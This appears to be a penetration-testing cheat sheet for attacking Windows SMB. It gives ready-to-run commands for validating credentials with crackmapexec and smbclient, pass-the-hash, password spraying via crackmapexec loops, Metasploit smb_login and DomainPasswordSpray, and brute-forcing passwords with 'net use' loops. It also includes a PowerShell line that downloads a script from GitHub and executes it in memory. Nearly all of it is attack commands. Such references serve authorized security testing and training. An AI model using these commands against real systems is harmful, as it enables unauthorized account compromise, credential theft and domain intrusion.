SMB
Use the SMB service to guess Windows related credentials. Especially usefull in an Active Directory environment.
Check Credentials
crackmapexec
crackmapexec [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]
| Result | Description |
|---|---|
[+] PWNED |
Valid credentials and local administrator |
[+] green |
Valid credentials |
[-] red |
Invalid credentials (or other error) |
Tip
Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.
smbclient
smbclient //<HOST>/<SHARE> -U <USERNAME>[%PASSWORD] -W [DOMAIN]
You should get an smb: \> prompt in case of working credentials. Do not specify any username or password and leave the password blank or add the -N flag to authenticate with a null session.
Tip
Use --pw-nt-hash and provide the NT hash instead of the password to authenticate using the pass-the-hash technique.
Note
Find available shares using share enumeration techniques.
Password Spray
Always be careful account lockout when performing password spray attacks in an Active Directory environment. See users enumeration techniques to get the list of all AD users and their failed password attempt count.
crackmapexec
for user in $(cat users.txt); do crackmapexec [HOST] -u $user -p [PASSWORD] -d [DOMAIN]; done
All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.
Info
The database file of cmedb is located at ~/.cme/cme.db.
Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS
set USER_FILE
set SMBDomain
set SMBPass
All valid users will be automatically saved to the workspace creds database.
PowerShell - DomainPasswordSpray.ps1
Automates the whole user enumeration and password spray process when run from whithin the domain.
Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]
When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.
Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]
Of course, the users list and domain name can also be specified manually.
Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]
Note
IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')
Reference: https://github.com/dafthack/DomainPasswordSpray
Brute Force
Native Windows - net use
for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause
Alternatively, we could append our result to a file:
for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]